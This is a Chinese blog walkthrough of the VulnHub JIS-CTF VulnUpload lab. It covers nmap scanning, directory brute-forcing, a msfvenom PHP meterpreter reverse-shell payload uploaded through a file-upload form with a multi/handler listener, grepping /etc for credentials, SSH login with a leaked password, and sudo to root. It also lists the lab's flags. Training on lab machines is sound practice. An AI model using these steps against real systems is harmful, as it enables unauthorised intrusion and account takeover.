最近看到了vnlnUpload上去浅浅打了一把,大家可以也去试一下对自己kali的基础运用巩固一下,这个靶场还是不错的涵盖了信息收集,robots,文件上传和ssh上线,我只是将自己的思路和攻击流程记录了一下。
我的截图可能有点乱因为这个靶场我打了两边第二遍才补充了细节部分
该靶机下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
- 主机发现
第一步将kali的权限提高 sudo su
密码为开始登录kali的密码
Namp -sn 192.168.38.0/24
vm8网卡所使用的网段ip,扫描192.168.38.0下的所有开机了的ip
- 端口扫描
Namp -Pn 192.168.38.0/24
扫描192.168.38.0所有开机的主机并把端口给显示出来
因为网站所需要用到http服务所以网站主机需要打开80端口,唯一打开的80端口的主机是192.168.38.129.
目录爆破
得知了网站ip开始对网站下的目录进行扫描
把他扫出来的目录依次查看发现
192.168.38.129/flag
192.168.38.129/admin_area/
192.168.38.129/index
是有用的
4、从网站目录爆破到的页面中,耐心查找有用信息flag1、flag2
大家也可以进robots.txt查看一下他记录的路径
flag1:8734509128730458630012095
直接进flag目录就可以看见flag
flag2:7412574125871236547895214
第二个flag 需要你右击查看他的源码才能找到,在他的源码中还发现了账号和密码猜测是登录网站的账号和密码
5、第4步中,可以找到用户名和密码,用此登录网站成功,看到一个文件上传页面,用 msfvenom 制作php木马,然后上传木马。
我们在目录扫描中发现index.php是他的网站主页,并通过第四步发现的账号和密码发现上面有上传功能所以我们做个木马文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.38.128 ip lport=4444 -f raw >shell.php
(攻击者是kali机的ip 端口填千位数以上的 千位数以下的容易重复 3306 8080 不能用 例如4444 6666 2222都是可以用的)
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=攻击机端口 -f raw >shell.php
打完后桌面上会有一个shell.php在浏览器提交这个文件
6、调用exploit/multi/handler的后门模块,并渗透成功
使用命令msfconsole进入msf use exploit/multi/handler(use进入模块)
Show options(查看模块配置)
Lhost填IP地址
Lport填端口
设置攻击文件
set lhost 192.168.38.128(自己的ip)
set lport 4444
set payload php/meterpreter/reverse_tcp
run 运行
会发现跑不动因为他是反弹shell
你需要进入 192.168.38.128/uploaded_files/shell.php
启动这个shell文件
7、通过meterpreter进入系统shell界面,查看当前用户信息
Getuid 可以看见你现在的用户id
我们输入shell
8、浏览最近几个目录中的文件,有没有线索文件?找到flag3。(8分)
ls(查看现在路径下的文件)未发现什么有用的文件
现在下面没有我们就cd .. 退到上一级目录直到看见hint这个词语是提示的意思那我们试着查看一下
然后我们cat hint.txt 得到了Flag3:7645110034526579012345670
9、根据flag3的提示,去找对应用户(假设为“xxx”)的密码。
刚刚那个文件我们除了flag还得到了一串英文
try to find user technawi password to read the flag.txt file, you can find it in a hidden file
看不懂就翻译
(试着找到用户technawi的密码来读取flag.txt文件,你可以在一个隐藏的文件中找到它)
他要我们去找technawi的密码来读取文件flag.txt
- 找到包含用户名“xxx”文本的文件,并查看该文件,找到flag4
我们用grep -ri "technawi" /etc/*命令来查找 /etc/目录下所有带technawi字的文件
不要急一步一步查看到有关键字 用户名username和technawi
我们cat /etc/mysql/conf.d/credentials.txt这个为文本文件
拿到flag和一个账号密码
Flag4:
7845658974123568974185412
11、利用上一步找到的用户账号信息,进行ssh登陆,并查找flag5
在上面这题这段英文提示中我们还没有看到flag.txt文件
try to find user technawi password to read the flag.txt file, you can find it in a hidden file
(试着找到用户technawi的密码来读取flag.txt文件,你可以在一个隐藏的文件中找到它)
我们用ssh登录来看这个文件
为了方便我们另外开个终端
ssh -p22 technawi@192.168.38.129
(ssh -p22 用户名@IP地址)
username : technawi
password : 3vilH@ksor
刚刚flag.txt在/var/www/html 路径下
cd /var/www/html/
ls
cat flag.txt
Flag5:5473215946785213456975249
- 用户“xxx”可以直接切换到root权限吗?
我们提权sudo -i
输入technawi密码即可拿到root权限
以后会经常更各种靶场教程,学习笔记和edusrc一些挖掘流程 本人学生也是低危时长两年半的渗透实习生。无法做到天天更新sorry。希望和大家一起进步
希望大家可以关注下我的公众号:安全的比奇堡